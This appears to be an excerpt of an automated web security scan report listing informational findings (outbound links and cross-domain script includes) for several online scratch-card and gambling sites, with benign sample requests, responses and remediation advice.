...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td>
    <a id="ctl00_cphHeader_objPageHeader_lnkAffiliate" class="HeaderLinks" href="http://www.heavenaffiliates.com" target="_blank">Affiliates</a>
...[SNIP]...
<a target="_self" onclick="OpenLobby();" href="#">
<img border="0" class="Home5FreeImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/5free_ENG_USD.gif" />
</a>
...[SNIP]...
<a onclick="javascript: try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="ContactUsMail.aspx">
<img border="0" class="HomeContactUsImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/ContactUs_ENG.gif" />
</a>
...[SNIP]...
<a target="_self" onclick="OpenLobby();" href="#">
<img border="0" class="HomeMainImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/Main_ENG_USD.jpg" />
</a>
...[SNIP]...
</div>
<img width="146" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/WinnersHeader_ENG_USD.gif" />
<script type="text/javascript">
...[SNIP]...
<MAP NAME=footerMapping>
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" ALT="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td class="FooterControlImageCell"><img alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" border="0" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
ber of the EU since May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates scratchcardheaven.com under a license issued and regulated by the <a class="ContentLinks" target="_blank" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf">Lotteries and Gaming Authority</a>
...[SNIP]...

18.48. http://www.trustlogo.com/ttb_searcher/trustlogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trustlogo.com
Path:	/ttb_searcher/trustlogo

Issue detail

The page was loaded from a URL containing a query string:

http://www.trustlogo.com/ttb_searcher/trustlogo?v_querytype=W&v_shortname=SC2&v_search=www.norskelodd.com&x=6&y=5

The response contains the following link to another domain:

http://www.comodogroup.com/

Request

GET /ttb_searcher/trustlogo?v_querytype=W&v_shortname=SC2&v_search=www.norskelodd.com&x=6&y=5 HTTP/1.1
Host: www.trustlogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 16 May 2011 12:31:58 GMT
Expires: Mon, 16 May 2011 12:32:58 GMT
Content-Length: 4164
Vary: Accept-Encoding

<html>
<head>
<title>Site Credentials for http://www.norskelodd.com/</title>
<style type=text/css>

<
...[SNIP]...
<br>
    <a href=http://www.comodogroup.com target="_blank">www.comodogroup.com</a>
...[SNIP]...

18.49. http://www.vincite.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vincite.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.vincite.net/?vid=540129

The response contains the following links to other domains:

http://br.winnings.com/?vid=540129
http://da.winnings.com/?vid=540129
http://de.winnings.com/?vid=540129
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://el.winnings.com/?vid=540129
http://es.winnings.com/?vid=540129
http://fi.winnings.com/?vid=540129
http://fr.winnings.com/?vid=540129
http://gmpg.org/xfn/11
http://it.info.winnings.com/AboutUs.aspx
http://it.info.winnings.com/ContactUsChat.aspx
http://it.info.winnings.com/ContactUsMail.aspx
http://it.info.winnings.com/ContactUsTel.aspx
http://it.info.winnings.com/Help.aspx
http://it.info.winnings.com/InviteFriend.aspx
http://it.info.winnings.com/PlayersClub.aspx
http://it.info.winnings.com/Promotions.aspx
http://it.info.winnings.com/contactusmail.aspx
http://it.info.winnings.com/fairPlay.aspx
http://it.info.winnings.com/responsible.aspx
http://it.info.winnings.com/securityandprivacy.aspx
http://it.info.winnings.com/terms.aspx
http://it.info.winnings.com/underage.aspx
http://it.winnings.com/
http://it.winnings.com/?vid=540129
http://it.winnings.com/comments/feed
http://it.winnings.com/feed
http://it.winnings.com/xmlrpc.php
http://nl.winnings.com/?vid=540129
http://no.winnings.com/?vid=540129
http://pt.winnings.com/?vid=540129
http://sv.winnings.com/?vid=540129
http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1
http://winnings.com/wp-includes/js/jquery/jquery.js?ver=1.4.2
http://winnings.com/wp-includes/wlwmanifest.xml
http://winnings.com/xmlrpc.php?rsd
http://www.cdnfo.com/css/style-new.css
http://www.cdnfo.com/images/chat.png
http://www.cdnfo.com/images/email.png
http://www.cdnfo.com/images/facebook.png
http://www.cdnfo.com/images/favicon.ico
http://www.cdnfo.com/images/follow_us/it/follow-us.png
http://www.cdnfo.com/images/home/it/eur/mid_flash_part.swf
http://www.cdnfo.com/images/home/logo.png
http://www.cdnfo.com/images/instant.png
http://www.cdnfo.com/images/it/bingo_icon_lobby.swf
http://www.cdnfo.com/images/it/casino_icon.swf
http://www.cdnfo.com/images/it/contact-us-text.jpg
http://www.cdnfo.com/images/it/lottery_icon.swf
http://www.cdnfo.com/images/it/poker_icon_lobby.swf
http://www.cdnfo.com/images/it/sports_icon_lobby.swf
http://www.cdnfo.com/images/paymentsbar.gif
http://www.cdnfo.com/images/phone.png
http://www.cdnfo.com/images/scratch.png
http://www.cdnfo.com/images/slots.png
http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js
http://www.facebook.com/WinningsCom?id=tb
http://www.facebook.com/winningscom
http://www.gamblersanonymous.org/
http://www.incomate.com/en/WinningsCom.html?sa=winnings.com
http://www.neogames.com/
http://www.winnings.com/?vid=540129&&nr=1
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[subdomain]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[lang]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[sessionId]=103122908; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:14 GMT
Connection: close
Content-Length: 23217

<!DOCTYPE html>
<html dir="ltr" lang="it-IT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La prima destinazione per vincere divertendosi online!..| Winnings.com</title>
<link rel="alternate" type="application/rss+xml" title="..| Winnings.com » Feed" href="http://it.winnings.com/feed" />
<link rel="alternate" type="application/rss+xml" title="..| Winnings.com » Feed dei commenti" href="http://it.winnings.com/comments/feed" />
<script type='text/javascript' src='http://winnings.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://winnings.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://winnings.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='..| Winnings.com' href='http://it.winnings.com' />
<meta name="generator" content="WordPress 3.0" />
<link rel='canonical' href='http://it.winnings.com/' />
<script type="text/javascript" >
...[SNIP]...
</script>

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="http://www.cdnfo.com/css/style-new.css" />
<link rel="pingback" href="http://it.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

<link type="image/x-icon" href="http://www.cdnfo.com/images/favicon.ico" rel="icon" /><link type="image/x-icon" href="http://www.cdnfo.com/images/favicon.ico" rel="shortcut icon" />
<center>
...[SNIP]...
<a href="http://www.vincite.net"><img src="http://www.cdnfo.com/images/home/logo.png" border="0" alt="Winnings.com" title="Winnings.com" width="374" height="91" /></a>
...[SNIP]...
<span class="facebook">

           <a href="http://www.facebook.com/WinningsCom?id=tb" target="_blank"><img src="http://www.cdnfo.com/images/follow_us/it/follow-us.png" width="140" height="40" border="0" alt="Seguici su Facebook" title="Seguici su Facebook" /></a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://www.winnings.com/?vid=540129&&nr=1" onclick="setLangCookie()">English</a></li><li class=" cssMenui"><a class="cssMenui" href="http://fr.winnings.com/?vid=540129">Fran..ais</a></li><li class=" cssMenui"><a class="cssMenui" href="http://es.winnings.com/?vid=540129">Espa..ol</a></li><li class=" cssMenui"><a class="cssMenui" href="http://de.winnings.com/?vid=540129">Deutsch</a></li><li class=" cssMenui"><a class="cssMenui" href="http://it.winnings.com/?vid=540129">Italiano</a></li><li class=" cssMenui"><a class="cssMenui" href="http://nl.winnings.com/?vid=540129">Dutch</a></li><li class=" cssMenui"><a class="cssMenui" href="http://pt.winnings.com/?vid=540129">Portugu..s (PT)</a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://br.winnings.com/?vid=540129">Portugu..s (BR)</a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://sv.winnings.com/?vid=540129">Svenska</a></li><li class=" cssMenui"><a class="cssMenui" href="http://no.winnings.com/?vid=540129">Norsk</a></li><li class=" cssMenui"><a class="cssMenui" href="http://da.winnings.com/?vid=540129">Dansk</a></li><li class=" cssMenui"><a class="cssMenui" href="http://fi.winnings.com/?vid=540129">Suomea</a></li><li class=" cssMenui"><a class="cssMenui" href="http://el.winnings.com/?vid=540129">Greek</a>
...[SNIP]...
</a> |
<a href="http://it.info.winnings.com/Promotions.aspx" class="topmenu11">Promozioni</a>|
<a href="http://it.info.winnings.com/PlayersClub.aspx" class="topmenu11">Club dei soci</a>|
<a href="http://www.incomate.com/en/WinningsCom.html?sa=winnings.com" class="topmenu11" target="_blank">Affiliati</a>
...[SNIP]...
<div>

<object class="midflash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="770" height="330" id="mid_flash_part" align="left"><param name="wmode" value="transparent" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" /><embed src="http://www.cdnfo.com/images/home/it/eur/mid_flash_part.swf" quality="high" bgcolor="#ffffff" width="770" height="330" name="mid_flash_part" align="left" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent"/><br />
...[SNIP]...
<td width="35" valign="top"><img src="http://www.cdnfo.com/images/slots.png" width="35" height="35" border="0" alt="" style="padding-right:3px;padding-top:16px;vertical-align:top;" /></td>
...[SNIP]...
<td width="35" height="35" valign="top"><img src="http://www.cdnfo.com/images/instant.png" width="35" height="35" border="0" alt="" style="padding-right:3px;padding-top:3px;vertical-align:top;" /></td>
...[SNIP]...
<td width="35" height="35" valign="top"><img src="http://www.cdnfo.com/images/scratch.png" width="35" height="35" border="0" alt="" style="padding-right:3px;vertical-align:top;" /></td>
...[SNIP]...
<td height="130" valign="top" style="padding-left:40px;" rowspan="3" alt="Casin.. on-line" title="Casin.. on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Casino-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/casino_icon.swf" FlashVars="srcURL=http://www.vincite.net/casino&target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Poker on-line" title="Poker on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Poker-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/poker_icon_lobby.swf" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Lotterie on-line" title="Lotterie on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="lottery-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/lottery_icon.swf" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Bingo on-line" title="Bingo on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="bingo-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/bingo_icon_lobby.swf" FlashVars="srcURL=http://www.vincite.net/bingo&target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Sport on-line" title="Sport on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Sports-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/sports_icon_lobby.swf" FlashVars="srcURL=http://www.vincite.net/sports&target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td colspan="4"><a href="http://it.info.winnings.com/ContactUsMail.aspx"><CENTER><img src="http://www.cdnfo.com/images/it/contact-us-text.jpg" width="137" height="17" border="0" style="padding-top:10px;padding-bottom:4px;"/></CENTER>
...[SNIP]...
<td><a href="http://it.info.winnings.com/ContactUsTel.aspx"><IMG SRC="http://www.cdnfo.com/images/phone.png" WIDTH="37" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://it.info.winnings.com/ContactUsMail.aspx"><IMG SRC="http://www.cdnfo.com/images/email.png" WIDTH="45" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://it.info.winnings.com/ContactUsChat.aspx"><IMG SRC="http://www.cdnfo.com/images/chat.png" WIDTH="42" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://www.facebook.com/winningscom" target="_blank"><IMG SRC="http://www.cdnfo.com/images/facebook.png" WIDTH="39" HEIGHT="36" BORDER="0" ALT=""></a>
...[SNIP]...
<center>
<a href="http://it.info.winnings.com/AboutUs.aspx" class="bottommenu">Chi siamo</a> |
<a href="http://it.info.winnings.com/terms.aspx" class="bottommenu">Termini d’uso</a> |
<a href="http://it.info.winnings.com/securityandprivacy.aspx" class="bottommenu">Sicurezza e Privacy</a> |
<a href="http://it.info.winnings.com/fairPlay.aspx" class="bottommenu">Fair play</a> |
<a href="http://it.info.winnings.com/responsible.aspx" class="bottommenu">Gioco responsabile</a> |
<a href="http://it.info.winnings.com/InviteFriend.aspx" class="bottommenu">Invita un amico</a>
...[SNIP]...
<center>
<a href="http://it.info.winnings.com/contactusmail.aspx" class="bottommenu"> Contatti</a> |
<a href="http://it.info.winnings.com/Help.aspx" class="bottommenu">Aiuto</a>
...[SNIP]...
<MAP NAME="footerMap">
<area shape="rect" coords="30,75,85,115" href="http://it.info.winnings.com/underage.aspx" alt="Gioco Responsabile Online" title="Gioco Responsabile Online" rel="nofollow" />
<area shape="rect" coords="85,75,190,115" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="Biglietti Gratta e Vinci Sicuri e Garantiti" title="Biglietti Gratta e Vinci Sicuri e Garantiti" target="_blank" rel="nofollow" />
<area shape="rect" coords="195,75,300,115" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="iTech Labs" title="iTech Labs" target="_blank" rel="nofollow" />
<area shape="rect" coords="315,75,475,115" href="http://www.neogames.com/" alt="NeoGames.com" title="NeoGames.com" target="_blank" rel="nofollow" />
<area shape="rect" coords="490,75,580,115" href="http://www.gamblersanonymous.org/" alt="Giocatori d'Azzardo Anonimi" title="Giocatori d'Azzardo Anonimi" target="_blank" rel="nofollow" />
<area shape="rect" coords="585,75,730,115" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="Autorit.. di Malta per le Lotterie e i Giochi" title="Autorit.. di Malta per le Lotterie e i Giochi" target="_blank" rel="nofollow" />
</MAP>
<img alt="" border="0" src="http://www.cdnfo.com/images/paymentsbar.gif" USEMAP="#footerMap" />
</div>
...[SNIP]...
bro dell’EU dal maggio 2007). La sede legale della Societ.. .. in 135, High street, Sliema SLM 1549, Malta. La Societ.. gestisce Winnings.com secondo un’autorizzazione emessa e regolata da <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" rel="nofollow">Lotteries and Gaming Authority</a>
...[SNIP]...

19. Cross-domain script include previous next
There are 178 instances of this issue:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg
http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
https://bingo.betsson.com/en/
http://blog.postcodelottery.com/
http://br.bigmoneyscratch.com/Home.aspx
http://br.winnings.com/
http://casino.bet365.com/home/en/
https://casino.betsson.com/en/
http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US
http://d.tradex.openx.com/afr.php
http://da.bigmoneyscratch.com/Home.aspx
http://da.winnings.com/
http://de.bigmoneyscratch.com/Home.aspx
http://de.winnings.com/
http://el.winnings.com/
http://es.bigmoneyscratch.com/Home.aspx
http://es.winnings.com/
http://fi.bigmoneyscratch.com/Home.aspx
http://fi.winnings.com/
http://fr.bigmoneyscratch.com/Home.aspx
http://fr.winnings.com/
http://games.bet365.com/home/en/
https://games.betsson.com/en/
http://getclicky.com/66384109
http://it.bigmoneyscratch.com/Home.aspx
http://itunes.apple.com/us/app/pclottery/id399201446
http://jquery.com/
http://leandrovieira.com/projects/jquery/lightbox/
https://livecasino.betsson.com/en/
http://mad4milk.net/
http://nl.bigmoneyscratch.com/Home.aspx
http://nl.winnings.com/
http://no.bigmoneyscratch.com/Home.aspx
http://no.winnings.com/
http://okscratchcards.com/
http://poker.bet365.com/home/en/
https://poker.betsson.com/en/
http://pt.bigmoneyscratch.com/Home.aspx
http://pt.winnings.com/
http://ronaldheft.com/code/analyticator/
https://scratch.betsson.com/en/
https://scratch.betsson.com/en/Casino
https://scratch.betsson.com/en/Casino/Bingo-Bonanza
https://scratch.betsson.com/en/Casino/Bubble-Bingo
https://scratch.betsson.com/en/Casino/Disco-Keno
https://scratch.betsson.com/en/Casino/HiLo
https://scratch.betsson.com/en/Casino/Lucky-21
https://scratch.betsson.com/en/Casino/Namaste
https://scratch.betsson.com/en/Casino/Poker-King
https://scratch.betsson.com/en/Casino/Roulette
https://scratch.betsson.com/en/Casino/Royal-Slots
https://scratch.betsson.com/en/Casino/Slot-Super-7
https://scratch.betsson.com/en/Classic
https://scratch.betsson.com/en/Classic/3-Wow
https://scratch.betsson.com/en/Classic/7th-Heaven
https://scratch.betsson.com/en/Classic/Champagne
https://scratch.betsson.com/en/Classic/Golden-Fortune
https://scratch.betsson.com/en/Classic/Happy-Birthday
https://scratch.betsson.com/en/Classic/Jungle-Joy
https://scratch.betsson.com/en/Classic/Neighbors
https://scratch.betsson.com/en/Classic/Spy-Comics
https://scratch.betsson.com/en/Classic/Super-3-Wow
https://scratch.betsson.com/en/Classic/Tiger-Mahjong
https://scratch.betsson.com/en/Classic/Wild-West
https://scratch.betsson.com/en/Classic/XO
https://scratch.betsson.com/en/Default.aspx
https://scratch.betsson.com/en/FAQ
https://scratch.betsson.com/en/Fantasy
https://scratch.betsson.com/en/Fantasy/Cash-Farm
https://scratch.betsson.com/en/Fantasy/Club-Pearl
https://scratch.betsson.com/en/Fantasy/Crazy-Cat
https://scratch.betsson.com/en/Fantasy/Dancing-Domino
https://scratch.betsson.com/en/Fantasy/Fast-Hands
https://scratch.betsson.com/en/Fantasy/Golden-Island
https://scratch.betsson.com/en/Fantasy/Knights-Battle
https://scratch.betsson.com/en/Fantasy/Love-Birds
https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds
https://scratch.betsson.com/en/Fantasy/Master-Mix
https://scratch.betsson.com/en/Fantasy/Memory-Madness
https://scratch.betsson.com/en/Fantasy/Ocean-Pearl
https://scratch.betsson.com/en/Fantasy/Outer-Space
https://scratch.betsson.com/en/Fantasy/Super-Chance
https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale
https://scratch.betsson.com/en/Fantasy/The-Lost-Maya
https://scratch.betsson.com/en/Fantasy/Treasure-Island
https://scratch.betsson.com/en/Fantasy/Zodiac
https://scratch.betsson.com/en/GameHistory
https://scratch.betsson.com/en/Information
https://scratch.betsson.com/en/News
https://scratch.betsson.com/en/OurScratchcards
https://scratch.betsson.com/en/Ourwinners
https://scratch.betsson.com/en/Slots/5th-Avenue
https://scratch.betsson.com/en/Slots/Adventure-Jack
https://scratch.betsson.com/en/Slots/Atlantis
https://scratch.betsson.com/en/Slots/Bon-Apetit
https://scratch.betsson.com/en/Slots/Cafe-Paris
https://scratch.betsson.com/en/Slots/Castle-Slots
https://scratch.betsson.com/en/Slots/Chic-Boutique
https://scratch.betsson.com/en/Slots/Conga-Beat
https://scratch.betsson.com/en/Slots/Egyptian-Magic
https://scratch.betsson.com/en/Slots/Esmeralda
https://scratch.betsson.com/en/Slots/Fair-Play
https://scratch.betsson.com/en/Slots/Fantasia
https://scratch.betsson.com/en/Slots/Grand-Crown
https://scratch.betsson.com/en/Slots/Holiday-Hotel
https://scratch.betsson.com/en/Slots/Ice-Land
https://scratch.betsson.com/en/Slots/Legend-Of-Terra
https://scratch.betsson.com/en/Slots/Monaco-Glamour
https://scratch.betsson.com/en/Slots/Monte-Carlo
https://scratch.betsson.com/en/Slots/Pirates-Paradise
https://scratch.betsson.com/en/Slots/Sakura-Garden
https://scratch.betsson.com/en/Slots/Sea-And-Sun
https://scratch.betsson.com/en/Slots/Sky-Of-Love
https://scratch.betsson.com/en/Slots/Triple-Carnival
https://scratch.betsson.com/en/Slots/Tropical-Fruit
https://scratch.betsson.com/en/Sports/100m-Champion
https://scratch.betsson.com/en/Sports/Bowling
https://scratch.betsson.com/en/Sports/Darts
https://scratch.betsson.com/en/Sports/Goal-Kick
https://scratch.betsson.com/en/Sports/Gone-Fishing
https://scratch.betsson.com/en/Sports/Hippodrome
https://scratch.betsson.com/en/Sports/Ready-Set-Go
https://scratch.betsson.com/en/Sports/Road-Racing
https://scratch.betsson.com/en/Sports/World-Champions
http://sv.bigmoneyscratch.com/Home.aspx
http://sv.winnings.com/
http://twitter.com/PostcodeLottery
http://twitter.com/PrimeScratch
http://twitter.com/crazyscratch
http://twitter.com/ukscratch
http://www.affiliatelounge.com/
https://www.aspireaffiliates.com/
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/marketing-samples/
https://www.aspireaffiliates.com/mobile/
https://www.betsson.com/start/en/
https://www.betsson.com/start/is/
https://www.betsson.com/web/en/sportsbook/
http://www.bigmoneyscratch.com/
http://www.facebook.com/
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/WinningsCom
http://www.facebook.com/crazyscratch
http://www.facebook.com/peoplespostcodelottery
http://www.facebook.com/plugins/likebox.php
http://www.gx4.com/
http://www.heavenaffiliates.com/
http://www.huddletogether.com/projects/lightbox2/
http://www.incomate.com/
http://www.metacafe.com/fplayer/
https://www.neogamespartners.com/
https://www.norskelodd.com/no/
https://www.norskelodd.com/no/FAQ
https://www.norskelodd.com/no/aboutus/
https://www.norskelodd.com/no/charity/
https://www.norskelodd.com/no/default.aspx
https://www.norskelodd.com/no/fair-play/
https://www.norskelodd.com/no/forgotten-password
https://www.norskelodd.com/no/play/3Wow
https://www.norskelodd.com/no/play/7thHeaven
https://www.norskelodd.com/no/play/GonzosQuest
https://www.norskelodd.com/no/promotions/
http://www.ok.co.uk/home/
http://www.okscratchcards.com/
http://www.opensource.org/licenses/mit-license.php
http://www.primegrattage.com/
http://www.vincite.net/
http://www.winnings.com/
http://www.winnings.com/how-to-win-money
http://www.winnings.com/instant-games
http://www.winnings.com/lottery-scratch-cards
http://www.winnings.com/scratch-cards
http://www.winnings.com/site-map
http://www.winnings.com/slots
http://www.youtube.com/user/CrazyScratchCom
http://www.youtube.com/user/PostcodeLottery
http://www.youtube.com/user/primescratchcards1

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adi/meta.homepage/adminMsg

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

